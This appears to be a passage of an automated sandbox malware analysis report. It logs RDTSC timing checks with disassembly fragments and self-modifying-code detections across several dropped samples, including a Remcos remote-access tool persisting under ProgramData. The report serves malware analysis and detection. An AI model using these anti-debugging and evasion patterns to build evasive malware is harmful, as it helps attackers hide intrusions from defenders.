Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360D7F second address: 5360DBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4764D9CBE8h 0x00000008 jmp 00007F4764D9CBE2h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4764D9CBDAh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360DBE second address: 5360DC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360DC2 second address: 5360DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360DC8 second address: 5360E06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F476474B51Dh 0x00000013 sbb cx, 29B6h 0x00000018 jmp 00007F476474B521h 0x0000001d popfd 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360E06 second address: 5360E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4764D9CBDAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360E14 second address: 5360E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360E18 second address: 5360E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4764D9CBE9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360E3E second address: 5360E53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360E53 second address: 5360E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4764D9CBDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360E63 second address: 53608B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0008h 0x0000000b nop 0x0000000c lea ecx, dword ptr [ebp-20h] 0x0000000f call 00007F47647499BFh 0x00000014 push ebp 0x00000015 mov ebp, esp 0x00000017 push ecx 0x00000018 mov dword ptr [ebp-04h], ecx 0x0000001b mov ecx, dword ptr [ebp-04h] 0x0000001e call 00007F476474BB06h 0x00000023 push ebp 0x00000024 mov ebp, esp 0x00000026 sub esp, 08h 0x00000029 mov dword ptr [ebp-04h], ecx 0x0000002c mov eax, dword ptr [ebp-04h] 0x0000002f cmp dword ptr [eax+14h], 10h 0x00000033 jc 00007F476474B51Ch 0x00000035 mov ecx, dword ptr [ebp-04h] 0x00000038 mov edx, dword ptr [ecx] 0x0000003a mov dword ptr [ebp-08h], edx 0x0000003d jmp 00007F476474B518h 0x0000003f mov eax, dword ptr [ebp-08h] 0x00000042 mov esp, ebp 0x00000044 pop ebp 0x00000045 ret 0x00000046 mov esp, ebp 0x00000048 pop ebp 0x00000049 ret 0x0000004a push eax 0x0000004b lea edx, dword ptr [ebp-00000448h] 0x00000051 push edx 0x00000052 call 00007F4769332140h 0x00000057 push 00000008h 0x00000059 jmp 00007F476474B520h 0x0000005e push 5A38AFCDh 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F476474B51Ch 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53700CA second address: 53700F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov eax, 72E46D63h 0x00000010 mov eax, 64267CBFh 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movzx esi, di 0x0000001d mov dh, 0Fh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53700F6 second address: 5370107 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F476474B51Bh 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370107 second address: 5370152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4764D9CBE1h 0x00000010 xor cx, 2BC6h 0x00000015 jmp 00007F4764D9CBE1h 0x0000001a popfd 0x0000001b jmp 00007F4764D9CBE0h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 mov eax, 08C1F567h 0x00000028 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: 91F4F3 second address: 91ED48 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jbe 00007F476474B516h 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F476474B525h 0x00000015 nop 0x00000016 jmp 00007F476474B528h 0x0000001b push dword ptr [ebp+122D03EDh] 0x00000021 add dword ptr [ebp+122D1E44h], edx 0x00000027 call dword ptr [ebp+122D1E59h] 0x0000002d pushad 0x0000002e jmp 00007F476474B524h 0x00000033 xor eax, eax 0x00000035 add dword ptr [ebp+122D1DB0h], esi 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f jnl 00007F476474B522h 0x00000045 mov dword ptr [ebp+122D2D29h], eax 0x0000004b jmp 00007F476474B525h 0x00000050 mov dword ptr [ebp+122D1E0Ah], ecx 0x00000056 mov esi, 0000003Ch 0x0000005b pushad 0x0000005c mov dword ptr [ebp+122D1D2Ah], edi 0x00000062 mov dword ptr [ebp+122D1E4Bh], eax 0x00000068 popad 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d jnl 00007F476474B517h 0x00000073 mov dword ptr [ebp+122D1DB0h], ecx 0x00000079 lodsw 0x0000007b jc 00007F476474B51Ch 0x00000081 mov dword ptr [ebp+122D1E4Bh], ebx 0x00000087 jng 00007F476474B51Ch 0x0000008d sub dword ptr [ebp+122D1E44h], ebx 0x00000093 add eax, dword ptr [esp+24h] 0x00000097 xor dword ptr [ebp+122D1E4Bh], ecx 0x0000009d mov ebx, dword ptr [esp+24h] 0x000000a1 mov dword ptr [ebp+122D1E2Dh], edx 0x000000a7 mov dword ptr [ebp+122D1D81h], edx 0x000000ad push eax 0x000000ae push eax 0x000000af push edx 0x000000b0 jmp 00007F476474B526h 0x000000b5 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: 91ED48 second address: 91ED4D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A95131 second address: A95156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F476474B520h 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F476474B516h 0x00000014 jo 00007F476474B516h 0x0000001a rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A95156 second address: A9515C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A9515C second address: A95162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A95162 second address: A95167 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A95167 second address: A95192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F476474B524h 0x00000009 pop ebx 0x0000000a jc 00007F476474B526h 0x00000010 jmp 00007F476474B51Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A941FF second address: A94203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A94203 second address: A94209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A94355 second address: A94359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A94359 second address: A94363 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F476474B51Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A944C8 second address: A944CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A976C8 second address: 91ED48 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 506F7ED7h 0x0000000f mov di, ax 0x00000012 push dword ptr [ebp+122D03EDh] 0x00000018 mov dword ptr [ebp+122D1DD4h], ebx 0x0000001e call dword ptr [ebp+122D1E59h] 0x00000024 pushad 0x00000025 jmp 00007F476474B524h 0x0000002a xor eax, eax 0x0000002c add dword ptr [ebp+122D1DB0h], esi 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 jnl 00007F476474B522h 0x0000003c mov dword ptr [ebp+122D2D29h], eax 0x00000042 jmp 00007F476474B525h 0x00000047 mov dword ptr [ebp+122D1E0Ah], ecx 0x0000004d mov esi, 0000003Ch 0x00000052 pushad 0x00000053 mov dword ptr [ebp+122D1D2Ah], edi 0x00000059 mov dword ptr [ebp+122D1E4Bh], eax 0x0000005f popad 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 jnl 00007F476474B517h 0x0000006a mov dword ptr [ebp+122D1DB0h], ecx 0x00000070 lodsw 0x00000072 jc 00007F476474B51Ch 0x00000078 mov dword ptr [ebp+122D1E4Bh], ebx 0x0000007e jng 00007F476474B51Ch 0x00000084 sub dword ptr [ebp+122D1E44h], ebx 0x0000008a add eax, dword ptr [esp+24h] 0x0000008e xor dword ptr [ebp+122D1E4Bh], ecx 0x00000094 mov ebx, dword ptr [esp+24h] 0x00000098 mov dword ptr [ebp+122D1E2Dh], edx 0x0000009e mov dword ptr [ebp+122D1D81h], edx 0x000000a4 push eax 0x000000a5 push eax 0x000000a6 push edx 0x000000a7 jmp 00007F476474B526h 0x000000ac rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A9770F second address: A97713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A97713 second address: A97777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dh, 6Eh 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F476474B518h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 stc 0x00000029 call 00007F476474B519h 0x0000002e pushad 0x0000002f jmp 00007F476474B526h 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 pop edx 0x00000038 popad 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F476474B51Dh 0x00000042 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A97777 second address: A9777B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A978AD second address: A978B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A978B1 second address: A978BE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A978BE second address: A978C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A978C2 second address: A978CC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4764D9CBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A978CC second address: A978D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A9794E second address: A97952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A97952 second address: A97976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F476474B518h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F476474B522h 0x00000018 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A97976 second address: A979EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov si, cx 0x0000000d mov dword ptr [ebp+122D1E2Dh], ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F4764D9CBD8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f call 00007F4764D9CBD9h 0x00000034 jmp 00007F4764D9CBDDh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F4764D9CBE6h 0x00000043 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A979EC second address: A979F6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F476474B516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A979F6 second address: A97A06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4764D9CBDBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A97A06 second address: A97A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c push esi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop esi 0x00000010 pop edi 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F476474B51Dh 0x0000001a rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A97A28 second address: A97A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4764D9CBD6h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: A97B66 second address: A97BFF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F476474B525h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov edx, dword ptr [ebp+122D1EADh] 0x00000012 movzx esi, dx 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 movzx esi, di 0x0000001b pop esi 0x0000001c push 74D80B1Fh 0x00000021 push edi 0x00000022 jmp 00007F476474B51Fh 0x00000027 pop edi 0x00000028 xor dword ptr [esp], 74D80B9Fh 0x0000002f mov dl, 6Dh 0x00000031 push 00000003h 0x00000033 jmp 00007F476474B524h 0x00000038 push 00000000h 0x0000003a adc si, 8860h 0x0000003f mov esi, dword ptr [ebp+122D1E5Eh] 0x00000045 push 00000003h 0x00000047 mov cx, bx 0x0000004a push 95C29D42h 0x0000004f jns 00007F476474B53Fh 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F476474B529h 0x0000005c rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AB6E60 second address: AB6E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AB6E6A second address: AB6E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AB754C second address: AB7579 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4764D9CBE1h 0x00000010 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AB7579 second address: AB7583 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F476474B51Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AB7B84 second address: AB7B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4764D9CBD6h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jns 00007F4764D9CBD6h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AB7B99 second address: AB7BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F476474B516h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AAC95E second address: AAC968 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4764D9CBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AAC968 second address: AAC97D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F476474B520h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AAC97D second address: AAC9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4764D9CBE3h 0x00000010 jnc 00007F4764D9CBD6h 0x00000016 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AAC9A1 second address: AAC9B1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F476474B516h 0x00000008 jbe 00007F476474B516h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AB8275 second address: AB8279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AB8279 second address: AB8281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AB8281 second address: AB82BB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4764D9CBEDh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4764D9CBE9h 0x0000000f rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AB8581 second address: AB8585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AB8585 second address: AB8598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBDDh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AB8598 second address: AB85A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AB85A0 second address: AB85A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AB8A11 second address: AB8A17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: ABAFF4 second address: ABB01D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4764D9CBE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jnp 00007F4764D9CBD6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: ABB1AD second address: ABB1C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F476474B518h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AC24E8 second address: AC24EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AC24EE second address: AC24F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AC2914 second address: AC291E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4764D9CBF2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	RDTSC instruction interceptor: First address: AC2F71 second address: AC2F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A5D932 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A5D886 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BFB9BC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: C8E8D7 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Special instruction interceptor: First address: 91EDAB instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Special instruction interceptor: First address: ABB0DF instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Special instruction interceptor: First address: B4DBDB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B8EDAB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: D2B0DF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: DBDBDB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Special instruction interceptor: First address: 47FCF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Special instruction interceptor: First address: 47FBD8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Special instruction interceptor: First address: 636785 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Special instruction interceptor: First address: 6AD6CD instructions caused by: Self-modifying code
Source: C:\ProgramData\Remcos\remcos.exe	Special instruction interceptor: First address: 47FCF5 instructions caused by: Self-modifying code
Source: C:\ProgramData\Remcos\remcos.exe	Special instruction interceptor: First address: 47FBD8 instructions caused by: Self-modifying code
Source: C:\ProgramData\Remcos\remcos.exe	Special instruction interceptor: First address: 636785 instructions caused by: Self-modifying code
Source: C:\ProgramData\Remcos\remcos.exe	Special instruction interceptor: First address: 6AD6CD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Special instruction interceptor: First address: BBEABE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Special instruction interceptor: First address: D5E5B1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Special instruction interceptor: First address: BBC506 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Special instruction interceptor: First address: DE7E11 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Special instruction interceptor: First address: 6DD932 instructions caused by: Self-modifying code
